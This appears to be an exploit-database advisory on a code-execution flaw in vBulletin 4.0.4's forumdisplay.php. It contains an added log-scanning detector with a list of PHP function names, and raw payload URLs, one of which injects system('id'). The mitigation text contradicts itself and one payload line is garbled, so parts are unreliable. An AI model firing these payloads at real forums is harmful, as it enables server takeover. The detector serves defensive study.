Vendor: vBulletin
By: mc2_s3lector
CVSS: 9.3 (HIGH)
Title: Local or adserver Javascript, forumdisplay.php Code Execution
CWE: 94
Product Name: vBulletin
Affected Version From: 4.0.4
Affected Version To: 4.0.4
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin:4.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2012

Vulnerability vBulletin – http://www.vbulletin.org Code Execution

A vulnerability in vBulletin 4.0.4 allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'GLOBALS[]' parameter of the 'forumdisplay.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary code on the system with the privileges of the web server process. Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Mitigation:

Upgrade to the latest version of vBulletin 4.0.4 or apply the patch provided by the vendor.
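
A detection-side complement to the mitigation, as an added example (not part of the original advisory or the exploit author's code): it scans web access logs for requests to forumdisplay.php that carry a GLOBALS key or PHP call syntax in a parameter, the request shapes listed in the raw data on this page. The combined log format, the function-name list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# PHP call syntax inside a parameter value, e.g. the system('id') form on this page.
# The function list is an assumption chosen for illustration; extend it as needed.
PHP_CALL = re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval|assert)\s*\(", re.I)
# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def inspect_target(target):
    """Return the reasons a request target looks like a forumdisplay.php probe."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/forumdisplay.php"):
        return []
    reasons = []
    # parse_qsl percent-decodes keys and values, so GLOBALS%5B%5D is caught too.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.split("[", 1)[0].upper() == "GLOBALS":
            reasons.append("GLOBALS key in query string")
        if PHP_CALL.search(value):
            reasons.append(f"PHP call syntax in parameter '{key}'")
    return reasons

def scan(lines):
    """Yield (line_number, reasons) for every flagged access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = inspect_target(match.group(1)) if match else []
        if reasons:
            yield number, reasons

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /vb/forumdisplay.php?f=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2012:10:00:05 +0000] "GET /vb/forumdisplay.php?GLOBALS%5B%5D=1&f=2 HTTP/1.1" 200 912',
    '198.51.100.7 - - [01/Jan/2012:10:00:09 +0000] "GET /patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=%22.system(%27id%27).%22 HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jan/2012:10:00:12 +0000] "GET /vb/showthread.php?t=5 HTTP/1.1" 200 7300',
    '203.0.113.5 - - [01/Jan/2012:10:00:15 +0000] "-" 408 0',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```
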

Exploit-DB raw data:

/*======================================================================*\
|| #################################################################### ||
|| # Vulnerability vBulletin - http://www.vbulletin.org               # ||
|| # Local or adserver Javascript,forumdisplay.php" Code Execution    # ||
|| # Version license 4.0.4					      # ||
|| # info set cookies, error issue & critical-information-disclosure  # ||
|| # Dork powered by vBulletin 4.0.4				      # ||
|| # author mc2_s3lector					      # ||
|| # Contact|http://www.yogyacarderlink.web.id			      # ||
|| #################################################################### ||
\*======================================================================*/
                         
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

/*======================================================================*\
|# #####################################################################  |
 # gretz: all family(www.yogyacarderlink.web.id)			# |			 
|# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byebye,93l4p_9uL1t@,	# |
|# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artupas,s0ul_34t3r,	# |
|# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis & all  			# |
|# KeDaiComputerworks.org						# |
|# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,& all# |				   		   
|# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com	# | 
|  #####################################################################  |
\*======================================================================*/